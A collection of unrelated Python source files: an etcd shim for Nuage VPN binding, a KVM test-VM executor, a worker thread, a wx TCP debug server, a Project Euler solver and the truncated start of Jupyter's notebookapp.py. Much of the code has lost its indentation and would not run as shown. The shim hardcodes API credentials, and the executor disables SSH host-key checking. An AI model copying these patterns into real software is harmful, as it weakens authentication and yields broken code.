# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Gluon shim layer for handling etcd messages
"""
import etcd
import os
import json
import argparse
import time
import string
import ntpath
import logging
from Queue import Queue
from threading import Thread
from nuage.vm_split_activation import NUSplitActivation
vsd_api_url = 'https://127.0.0.1:8443'
etcd_default_port = 2379
etcd_nuage_path = '/controller/nuage/'
client = None
prev_mod_index = 0
vm_status = {}
valid_host_ids = ('cbserver5', 'node-23.opnfvericsson.ca')
proton_etcd_dir = '/net-l3vpn/proton'
def notify_proton_vif(proton, uuid, vif_type):
path = proton + '/controller/host/' + uuid
data = {"status": vif_type}
client.write(path, json.dumps(data))
def notify_proton_status(proton, uuid, status):
path = proton + '/controller/port/' + uuid
data = {"status": status}
client.write(path, json.dumps(data))
def save_bind_status(uuid, status):
""" save the vm status both in etcd and in-memory dictionary
"""
path = etcd_nuage_path + uuid
data = {"status": status}
try:
if status == 'unbound':
client.delete(path)
del vm_status[uuid]
else:
client.write(path, json.dumps(data))
vm_status[uuid] = status
except Exception, e:
logging.error("saving bind status failed %s" % str(e))
def update_bind_status(proton, uuid, status):
"""wrapper function to call status update of the bind operation"""
notify_proton_status(proton, uuid, status)
save_bind_status(uuid,status)
def restore_bind_status():
"""restore the bind status from etcd to in-memory dict, typically called during program startup"""
global vm_status
try:
statuses = client.read(etcd_nuage_path)
if statuses:
for status in statuses.children:
val = json.loads(status.value)
logging.info("storing key %s and value %s" % (status.key, val["status"]))
vm_status[ntpath.basename(status.key)] = val["status"]
logging.info("vm_status = %s", vm_status)
except Exception, e:
logging.error("reading keys failed %s" % str(e))
return
def initialize_worker_thread(messages_queue):
worker = Thread(target=process_queue, args=(messages_queue,))
worker.setDaemon(True)
worker.start()
return worker
def compute_network_addr(ip, prefix):
"""
return network address
"""
addr = ip.split('.')
prefix = int(prefix)
mask = [0, 0, 0, 0]
for i in range(prefix):
mask[i / 8] += (1 << (7 - i % 8))
net = []
for i in range(4):
net.append(int(addr[i]) & mask[i])
return '.'.join(str(e) for e in net)
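# Example (hypothetical values): compute_network_addr('10.1.2.3', '24')
# returns '10.1.2.0'.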
def compute_netmask(prefix):
"""
return netmask
:param prefix:
:return:
"""
prefix = int(prefix)
mask = [0, 0, 0, 0]
for i in range(prefix):
mask[i / 8] += (1 << (7 - i % 8))
ret = '.'.join(str(e) for e in mask)
print('Calculated mask = %s' % ret)
return ret
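# Example (hypothetical value): compute_netmask('24') returns '255.255.255.0'.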
def bind_vm(data, vpn_info):
subnet_name = 'Subnet' + str(time.clock())
subnet_name = string.replace(subnet_name, '.', '-')
prefix = data.get('subnet_prefix', '32')
print('prefix = %s' % prefix)
config = {
'api_url': vsd_api_url,
'domain_name': vpn_info['name'],
'enterprise': 'csp',
'enterprise_name': 'Gluon',
'netmask': compute_netmask(prefix),
'network_address': compute_network_addr(data.get('ipaddress', ''), prefix),
'password': 'csproot',
'route_distinguisher': vpn_info["route_distinguisher"],
'route_target': vpn_info["route_target"],
'subnet_name': subnet_name,
'username': 'csproot',
'vm_ip': data.get('ipaddress', ''),
'vm_mac': data.get('mac_address', ''),
'vm_name': data.get('device_id', ''), ## uuid of the VM
'vm_uuid': data.get('device_id',''),
'vport_name': data.get('id', ''),
'zone_name': 'Zone0',
'tunnel_type': 'GRE',
'domain_template_name': 'GluonDomainTemplate'
}
sa = NUSplitActivation(config)
return sa.activate()
def unbind_vm(data, vpn_info):
config = {
'api_url': vsd_api_url,
'domain_name': vpn_info['name'],
'enterprise': 'csp',
'enterprise_name': 'Gluon',
'username': 'csproot',
'password': 'csproot',
'vm_uuid': data.get('device_id', ''),
'vport_name': data.get('id', '')
}
sa = NUSplitActivation(config)
return sa.deactivate()
def get_vpn_info(client, uuid):
vpn_info = {}
try:
vpn_port = json.loads(client.get(proton_etcd_dir + '/VPNPort/' + uuid).value)
if not vpn_port:
logging.error("vpn port is empty for uuid %s" % uuid)
return False
else:
vpn_instance = json.loads(client.get(proton_etcd_dir + '/VpnInstance/' + vpn_port['vpn_instance']).value)
if vpn_instance:
vpn_info['route_distinguisher'] = vpn_instance['route_distinguishers']
vpn_info['name'] = vpn_instance['vpn_instance_name']
vpn_afconfig = json.loads(client.get(proton_etcd_dir + '/VpnAfConfig/' + vpn_instance['ipv4_family']).value)
if vpn_afconfig:
vpn_info['route_target'] = vpn_afconfig['vrf_rt_value']
else:
logging.error("vpnafconfig is empty for uuid %s" % uuid)
else:
logging.error("vpn instance is empty for %s" % vpn_port['vpn_instance'])
return False
except etcd.EtcdKeyNotFound:
return False
return vpn_info
def process_base_port_model(message, uuid, proton_name):
global client
global valid_host_ids
action = message.action
if action == 'set' or action == 'update':
message_value = json.loads(message.value)
if message_value['host_id'] is None or message_value['host_id'] == '':
logging.info("host id is empty")
if vm_status.get(uuid, '') == 'up' or vm_status.get(uuid, '') == 'pending':
logging.info("Port is bound, need to unbind")
if not hasattr(message, '_prev_node'):
logging.info("_prev_node is not available")
return
vpn_info = get_vpn_info(client, uuid)
unbind_vm(json.loads(message._prev_node.value), vpn_info)
update_bind_status(proton_name, uuid, 'unbound')
return
if not message_value['host_id'] in valid_host_ids:
logging.info("host id %s is not recognized", message_value['host_id'])
return
if uuid in vm_status and vm_status[uuid] == 'pending':
return
update_bind_status(proton_name, uuid, 'pending')
vpn_info = get_vpn_info(client, uuid)
if bind_vm(json.loads(message.value), vpn_info):
update_bind_status(proton_name, uuid, 'up')
return
else:
logging.error("failed activating vm")
return
elif action == 'delete':
if vm_status[uuid] == 'up':
vpn_info = get_vpn_info(client, uuid)
unbind_vm(json.loads(message.value), vpn_info)
update_bind_status(proton_name, uuid, 'unbound')
return
else:
logging.error('unknown action %s' % action)
def process_queue(messages_queue):
logging.info("processing queue")
while True:
item = messages_queue.get()
process_message(item)
messages_queue.task_done()
def process_message(message):
logging.info("msg = %s" % message)
#logging.info("msg.key = %s" % message.key)
#logging.info("msg.value = %s" % message.value)
#logging.info("msg.action = %s" % message.action)
path = message.key.split('/')
if len(path) < 5:
logging.error("unknown message %s, ignoring" % message)
return
proton_name = path[1]
table = path[3]
uuid = path[4]
if table == 'ProtonBasePort':
process_base_port_model(message, uuid, proton_name)
else:
logging.info('table %s is not monitored' % table)
return
def getargs():
parser = argparse.ArgumentParser(description='Start Shim Layer')
parser.add_argument('-d', '--debug', required=False, help='Enable debug output', dest='debug',
action='store_true')
parser.add_argument('-H', '--host-name', required=False, help='etcd hostname or ip, default to localhost',
dest='etcd_host', type=str)
parser.add_argument('-p', '--port', required=False, help='etcd port number, default to 2379', dest='etcd_port',
type=str)
parser.add_argument('-v', '--vsd-ip', required=False, help='Nuage vsd ip address, default to 127.0.0.1', dest='vsd_ip',
type=str)
args = parser.parse_args()
return args
def main():
global client, vsd_api_url
logging.basicConfig(level=logging.DEBUG)
logging.info('Starting server in PID %s' % os.getpid())
args = getargs()
if args.etcd_host:
etcd_host = args.etcd_host
else:
etcd_host = 'localhost'
    if args.etcd_port:
etcd_port = int(args.etcd_port)
else:
etcd_port = etcd_default_port
if args.vsd_ip:
vsd_api_url = 'https://' + args.vsd_ip + ':8443'
messages_queue = Queue()
initialize_worker_thread(messages_queue)
client = etcd.Client(host=etcd_host, port=etcd_port, read_timeout=3600)
restore_bind_status()
wait_index = 0
while True:
try:
logging.info("watching %s" % proton_etcd_dir)
if wait_index:
message = client.read(proton_etcd_dir, recursive=True, wait=True, waitIndex=wait_index)
else:
message = client.read(proton_etcd_dir, recursive=True, wait=True)
messages_queue.put(message)
if (message.modifiedIndex - wait_index) > 1000:
wait_index = 0
else:
wait_index = message.modifiedIndex + 1
except etcd.EtcdWatchTimedOut:
logging.info("timeout")
pass
except etcd.EtcdException:
logging.error("Cannot connect to etcd, make sure that etcd is running. Trying in 5 seconds")
time.sleep(5)
except KeyboardInterrupt:
logging.info("exiting on interrupt")
exit(1)
except:
pass
if __name__ == '__main__':
main()
|
kvm_executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""A script that starts a vm, reverts it to a known snapshot, tests a
submission bundle (submission + tests), and closes the vm"""
from __future__ import with_statement
# Use simplejson or Python 2.6 json, prefer simplejson.
try:
import simplejson as json
except ImportError:
import json
import os
import sys
import time
import logging
import signal
import ConfigParser
from threading import Thread
from subprocess import Popen, PIPE, STDOUT
import serial
from vmchecker.config import VmwareMachineConfig, CourseConfig, VmwareConfig
from vmchecker.generic_executor import VM, Host
_logger = logging.getLogger('vm_executor')
class kvmHost(Host):
def getVM(self, bundle_dir, vmcfg, assignment):
return kvmVM(self, bundle_dir, vmcfg, assignment)
class kvmVM(VM):
hostname = 'kvm2'
def __init__(self, host, bundle_dir, vmcfg, assignment):
VM.__init__(self, host, bundle_dir, vmcfg, assignment)
self.hostname = self.machinecfg.get_vmx_path()
self.path = self.getPath()
print self.path
def executeCommand(self,cmd):
_logger.info("executeCommand: %s" % cmd)
return self.host.executeCommand("ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "+self.username+"@"+self.IP+" "+cmd)
def power_on_kvm(self):
o = self.host.executeCommand("virsh start kvm2")
if "started" in o:
print "Exit"
sys.exit()
def start(self):
power_thd = Thread(target = self.power_on_kvm)
power_thd.start()
power_thd.join()
self.IP = self.getIP()
def stop(self):
self.host.executeCommand("virsh destroy "+self.hostname)
def revert(self, number = None):
self.stop() # just in case it's on
self.host.executeCommand("rm -f "+os.path.join(self.path,"run.qcow2"))
self.host.executeCommand("cp "+os.path.join(self.path,"image.qcow2")+" "+os.path.join(self.path,"run.qcow2"))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+host_path+" "+self.username+"@"+self.IP+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+self.username+"@"+self.IP+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
        if timeout is None:
thd.join()
else:
thd.join(timeout)
return thd.isAlive()
def getMac(self):
mac = self.host.executeCommand("virsh dumpxml "+self.hostname)
mac = mac[mac.find("<mac address=")+14:]
mac = mac[:mac.find("'/>")]
return mac.strip()
def getPath(self):
path = self.host.executeCommand("virsh dumpxml "+self.hostname)
path = path[path.find("<source file='")+14:]
path = path[:path.find("'/>")]
return os.path.dirname(path)
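    # getMac()/getPath() scrape the first <mac address='...'/> and
    # <source file='...'/> entries out of the `virsh dumpxml` output; e.g. a
    # (hypothetical) <source file='/var/lib/libvirt/images/kvm2/run.qcow2'/>
    # yields the directory /var/lib/libvirt/images/kvm2.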
def getIP(self):
mac = self.getMac()
while True:
arps = self.host.executeCommand("arp -a").split("\n")
time.sleep(1)
for arp in arps:
if mac in arp:
IP = arp[arp.find("(")+1:arp.find(")")]
_logger.info("IP: %s" % IP)
return IP
def getIPfromIfconfig(self,string):
s = string[string.find("inet addr:")+10:]
s = s[0:s.find(" ")]
return s
|
worker.py
|
import logging
import threading
import time
from persistence import pop_from_queue
class ProcessingWorker(object):
current_workflow = None
current_step = None
_exit_event = threading.Event()
_worker_thread = None
def __init__(self):
self.logger = logging.getLogger('spreadsplug.web.worker')
def start(self):
self.logger.debug("Starting worker thread")
self._worker_thread = threading.Thread(target=self._run)
self._worker_thread.start()
def stop(self):
self.logger.debug("Stopping worker thread")
self._exit_event.set()
def _run(self):
self.logger.debug("Worker thread commencing.")
while not self._exit_event.is_set():
workflow = pop_from_queue()
if workflow is not None:
self.logger.info("Starting processing of workflow '{0}'"
.format(workflow.path.stem))
workflow.process()
self.logger.info("Starting output generation of workflow '{0}'"
.format(workflow.path.stem))
workflow.output()
time.sleep(1)
self.logger.debug("Thread has finished")
|
tcp_server_gui.py
|
#!/usr/bin/env python
"""
Copyright (c) 2012, Bruce A. Corliss
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the BACETech Consulting nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL Bruce A. Corliss BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import os
import shutil
import socket
import sys
import time
import atexit
import threading
# Global Variables
tcp_socket = None
tcp_conn = None
listen_thread = None
listen_thread_pid = None
# Parameters
ID_START = wx.NewId()
ID_STOP = wx.NewId()
# Define notification event for thread completion
EVT_RESULT_ID = wx.NewId()
CMD_DELIM = ';'
MSG_DELIM = ';;'
BUFFER_SIZE = 1024
APP_W = 700
APP_H = 350
PAD=10
class TextFrame(wx.Frame):
def __init__(self):
""" Initialize tcp server gui."""
wx.Frame.__init__(self, None, -1, 'Zen Controller Debug Server', size=(APP_W , APP_H))
# Add panel
self.panel = wx.Panel(self, wx.ID_ANY)
# TCP Connection Objects
self.hostAddress_text = wx.StaticText(self.panel, -1, "IP Address", pos=(10,10))
self.hostAddress_edit = wx.TextCtrl(self.panel, -1, "127.0.0.1", pos=(100, 10), size=(75, 15))
self.hostPort_text = wx.StaticText(self.panel, -1, "Port", pos=(10, 25), size=(20,20))
self.hostPort_edit = wx.TextCtrl(self.panel, -1, "22500", pos=(100, 25), size=(75, 15))
self.startserver_toggle = wx.ToggleButton(self.panel, -1, "Start Server", pos=(200, 8), size=(100,35))
# Command input
self.output_text = wx.StaticText(self.panel, -1, "Output", pos=(10,50))
self.output_edit = wx.TextCtrl(self.panel, -1,"",size=(APP_W - 3*PAD, 200),
style=wx.TE_MULTILINE, pos=(PAD,70))
self.output_edit.SetEditable(False)
# Callbacks
self.startserver_toggle.Bind(wx.EVT_TOGGLEBUTTON, self.StartServer_Callback, self.startserver_toggle)
        # Receive timer
        self.receive_timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.TcpAcceptConnection, self.receive_timer)
def StartServer_Callback(self, event):
""" Starts or stops acting as tcp server."""
global listen_thread
global listen_thread_pid
global tcp_socket
global tcp_conn
if self.startserver_toggle.GetValue():
self.LogThis("Starting server...")
self.startserver_toggle.SetLabel("Stop Server")
self.TcpServerConnect()
# Start new thread for listening
listen_thread = threading.Thread(target=self.TcpAcceptConnection)
            listen_thread.daemon = True
listen_thread.start()
else:
self.LogThis("Stopping server...")
self.startserver_toggle.SetLabel("Start Server")
# Close tcp connection if it exists
if tcp_conn is not None: tcp_conn.close()
if tcp_socket is not None: tcp_socket.close()
            # Let the listen thread exit on its own: it is a daemon, it checks the
            # toggle state, and closing the socket above makes blocking accept()/recv()
            # calls fail. Threads share the process PID (listen_thread_pid == os.getpid()),
            # so the previous "kill -9" would have terminated the whole application.
            if listen_thread is not None and listen_thread.is_alive():
                self.LogThis("Waiting for listen_thread to finish...")
                listen_thread.join(timeout=2)
tcp_conn = None
tcp_socket = None
def TcpServerConnect(self):
""" Initialize tcp connection for server"""
global tcp_socket
global tcp_conn
# Initialize tcp socket
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.LogThis("Binding and listening: " + self.hostAddress_edit.GetLabel() +
": " + self.hostPort_edit.GetLabel())
tcp_socket.bind((self.hostAddress_edit.GetLabel(), int(self.hostPort_edit.GetLabel())))
tcp_socket.listen(1)
def TcpAcceptConnection(self):
""" Monitors connection, collects message in buffer until message sent, responds, repeats."""
global tcp_socket
global tcp_conn
global listen_thread_pid
# Get PID
listen_thread_pid = os.getpid()
self.LogThis("Waiting for client connection...")
tcp_conn, addr = tcp_socket.accept()
self.LogThis("Client address: " + "".join(str(addr)))
while True:
msg_buffer = ''
while True:
if not self.startserver_toggle.GetValue(): return
wx.Yield()
self.LogThis("Waiting for client message...")
msg_buffer += tcp_conn.recv(BUFFER_SIZE)
if msg_buffer.find(MSG_DELIM) >= 0:
self.LogThis("Client:\t " + msg_buffer)
                    # Send RECIEVED acknowledgement (spelling kept to match the wire protocol string)
self.LogThis("Server:\t " + "RECIEVED" + MSG_DELIM)
tcp_conn.sendall("RECIEVED" + MSG_DELIM)
# Send DONE to terminate message group
self.LogThis("Server:\t " + "DONE" + MSG_DELIM)
tcp_conn.sendall("DONE" + MSG_DELIM)
break
time.sleep(.5)
def LogThis(self, output_str):
        print(output_str)
self.output_edit.AppendText("\n" + output_str)
self.output_edit.ShowPosition(self.output_edit.GetLastPosition())
self.output_edit.Refresh()
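
# Hypothetical client sketch (not part of the original file): connect to the
# server above, send one ';;'-terminated message, and read replies until the
# 'DONE;;' marker arrives. Host/port default to the values pre-filled in the GUI.
def example_client(host="127.0.0.1", port=22500):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.sendall(("hello" + MSG_DELIM).encode("ascii"))
    reply = ""
    while ("DONE" + MSG_DELIM) not in reply:
        reply += client.recv(BUFFER_SIZE).decode("ascii")
    client.close()
    return reply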
def main():
app = wx.PySimpleApp()
frame = TextFrame()
frame.Show()
app.MainLoop()
if __name__ == "__main__":
main()
|
034 - digit factorials.py
|
#!python3
# coding: utf-8
# 145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
# Find the sum of all numbers which are equal to the sum of the factorial of their digits.
# Note: As 1! = 1 and 2! = 2 are not sums they are not included.
#https://projecteuler.net/problem=34
from time import perf_counter
from math import factorial
from typing import List
from multiprocessing import Process, Queue, cpu_count
def timed(function):
"decorator for time performance of function"
def wrapper(*args, **kwargs):
start = perf_counter()
value = function(*args, **kwargs)
finish = perf_counter()
fname = function.__name__
print(f"\n{fname} function took {finish - start:.2f} seconds")
return value
return wrapper
def isSumOfFactorials(n, factorial_table):
"returns True if n is sum of factorials of its digits"
sumofFact = 0
for digit in str(n):
sumofFact += factorial_table[int(digit)]
return sumofFact == n
def sumOfmagicnumbers2(lower, upper, factorial_table, que) -> None:
    "puts onto que the sum of numbers in [lower, upper) that equal the \
sum of the factorials of their digits (1 and 2 included)"
sum_of_numbers = 0
for i in range(lower, upper):
if isSumOfFactorials(i, factorial_table):
sum_of_numbers += i
que.put(sum_of_numbers)
@timed
def main():
factorial_table = {}
for i in range(10):
factorial_table[i] = factorial(i)
    limit = 1_000_000  # search bound; the strict mathematical bound is 7 * 9! = 2_540_160, but no qualifying number comes close to 1_000_000
sizeOfSlice = limit//cpu_count()
slices = []
    for i in range(cpu_count()):
        slices.append([sizeOfSlice*i, sizeOfSlice*(i+1)])
    slices[-1][1] = limit  # integer division may otherwise drop the tail of the range
que = Queue()
    # one worker process per slice (the original hard-coded exactly four
    # processes, which fails whenever cpu_count() != 4)
    processes = [Process(target=sumOfmagicnumbers2,
                         args=(lower, upper, factorial_table, que))
                 for lower, upper in slices]
for proces in processes:
proces.start()
total = 0
for proces in processes:
total += que.get()
proces.join()
print("\nSum of the numbers:", total-3) #subtract for 1 and 2 factorials
if __name__ == "__main__":
main()
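
# For reference, a single-process sketch of the same search (an illustrative
# cross-check, not part of the original script); it is never called above.
def single_process_reference(limit: int = 100_000) -> int:
    """Sum of all n >= 10 below `limit` that equal the sum of the factorials
    of their digits (1 and 2 excluded, matching the problem statement)."""
    table = {d: factorial(d) for d in range(10)}
    return sum(n for n in range(10, limit)
               if n == sum(table[int(c)] for c in str(n)))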
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# check for tornado 3.1.0
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
from .traittypes import TypeFromClasses
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
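# Illustrative note (not part of the upstream function): random_ports(8888, 50)
# first yields 8888..8892, then 45 values drawn uniformly from
# [8888 - 100, 8888 + 100] (clamped below at 1).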
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
